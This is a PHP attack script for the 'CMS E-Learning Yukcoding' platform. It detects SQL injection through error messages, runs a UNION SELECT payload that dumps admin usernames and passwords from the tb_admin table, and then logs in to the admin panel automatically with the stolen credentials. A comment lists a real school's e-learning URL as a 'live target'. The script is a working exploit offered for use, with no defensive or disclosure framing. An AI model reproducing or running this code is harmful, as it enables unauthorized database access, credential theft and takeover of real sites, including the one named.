Exploit CMS E-Learning Yukcoding

<?php
/**
*
* @author Z0NK3X ft R3VO
* @package Exploit CMS E-Learning Yukcoding
* Payload by R3VO
* SQLi CMS E-Learning Yukcoding v1.0
*
*/
function getstr($string, $start, $end){
    $str = explode($start,$string);
    $str = explode($end,$str[1]);
    return $str[0];
}
function check_connection($url){
    if(!filter_var($url, FILTER_VALIDATE_URL))
    {
    return false;
    }

    //initialize curl
    $curlInit = curl_init($url);
    curl_setopt($curlInit,CURLOPT_CONNECTTIMEOUT,10);
    curl_setopt($curlInit,CURLOPT_HEADER,true);
    curl_setopt($curlInit,CURLOPT_NOBODY,true);
    curl_setopt($curlInit,CURLOPT_RETURNTRANSFER,true);

    //get answer
    $response = curl_exec($curlInit);

    curl_close($curlInit);

    if ($response) return true;

    return false;
}
function detect_sqli($url){
    if (preg_match('/You have an error in your SQL syntax; check the manual that corresponds to your/i', file_get_contents($url."'"))) {
        return true;
    }
    else{
        return false;
    }
}
function get_upw($url){
    return getstr(file_get_contents($url),"        <li>,","      </div>");
}
function curl($url){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_HEADER, 1);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding: gzip, deflate, br',
'accept-language: en-US,en;q=0.9,id;q=0.8',
'cache-control: max-age=0',
'Cookie:',
'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36'
  ));
  $res = curl_exec($ch);
  $header = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
  $body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
  curl_close($ch);
  $cookie = getstr($header, "Set-Cookie: ",";");
  return ["header" => $header,"cookie" => $cookie];
}function post_data($url, $param){
    $curl = curl($url);
    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, $url);
    curl_setopt($c, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36");
    curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_HTTPHEADER, array(
'Accept: */*',
'Accept-Encoding: gzip, deflate',
'Accept-Language: en-US,en;q=0.9,id;q=0.8',
'Connection: keep-alive',
'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
'Cookie: '.$curl["cookie"],
'X-Requested-With: XMLHttpRequest'
    ));
    curl_setopt($c, CURLOPT_POSTFIELDS,$param);
    curl_setopt($c, CURLOPT_POST, 1);
    $out = curl_exec($c);
    return $out;
}
function exploit_sqli($url){
    $green  = "\e[1;92m";
    $cyan   = "\e[1;36m";
    $putih  = "\e[0m";
    $blue   = "\e[34m";
    $green1 = "\e[0;92m";
    $yellow = "\e[93m";
    $red    = "\e[1;91m";
    if (detect_sqli($url)) {
    echo "[+] Target is ".$green1."Vulnerable!\n".$putih;
    $payload = "%27%20+UNION+ALL+SELECT+1,@@version,make_set(6,@:=0x0a,(select(1)from(tb_admin)where@:=make_set(511,@,0x3c6c693e,username,pass)),@),4,5,6--+";
    $id = getstr($url."<", "id_berita=","<");
    $exp = str_replace($id, "-".$id.$payload, $url);
    $get = file_get_contents($exp);
    if (!preg_match('/<li>,/i', $get)) {
        echo "[-] Can't Get Database, maybe not vulnerable\n";
        exit();
    }
    $dsqli = getstr($get, '<h3 align="center">','</h3>');
    echo "[+] VersionDB : ".$dsqli."\n";
    $pecah = str_replace([",<li>,",","],["\n","|"],get_upw($exp));
    $x = 1;
    echo "+--------------------------------+\n";
    foreach (explode("\n", $pecah) as $up) {
    $pch = explode("|", $up);
    echo "[+] Data User & Pass [".$x++."]\n";
    echo "+--------------------------------+\n";
    echo "[+] Username      : ".$cyan.$pch[0].$putih."\n";
    echo "[+] Passowrd      : ".$cyan.$pch[1].$putih."\n";
    echo "+--------------------------------+\n";
    $urp = parse_url($url);
    $adlo = $urp["scheme"]."://".$urp["host"].$urp["path"]."admin/";
    echo "[?] Trying Login\n";
    sleep(1);
    echo "[*] Posting Data to ".$adlo."inc/proses_login.php\n";
    sleep(1);
    echo "[*] Form Data : ".str_replace("      ", "","user=".$pch[0]."&pass=".$pch[1])."\n";
    sleep(1);
    if(post_data($adlo."inc/proses_login.php", str_replace("      ", "","user=".$pch[0]."&pass=".$pch[1])) == "sukses"){
        echo "[*] Getting Response\n";
        sleep(2);
        echo $green1."[+] Login Success!\n".$putih;
    }else{
        echo "[*] Getting Response\n";
        echo $red."[-] Login Failed!\n".$putih;
    }
    }
    echo "+--------------------------------+\n";
    }
    else{
    echo "[-] Target isn't ".$red."Vulnerable!\n".$putih;
    }
}
/**** LIVE TARGET ****/
# http://smkadisumarmo.sch.id/e-Learning/?hal=daftar&page=berita&action=detail&id_berita=7
echo "[!] USE PROTOCOL! [HTTP/HTTPS]\n";
$url = readline("[*] URL TARGET   : ");
$urp = parse_url($url);
$adlo = $urp["scheme"]."://".$urp["host"].$urp["path"]."admin/";
echo "[+] Connecting to Target\n";
if (check_connection($url)) {
echo "[?] Starting Exploit\n";
exploit_sqli($url)."\n";
echo "[+] Admin Login\n[*] $adlo\n";
echo "+------------[ FINISH ]----------+\n";
}else{
echo "[-] Couldn't Connect to Target!\n";
echo "[?] Please to check your connection\n";
exit();
}
?>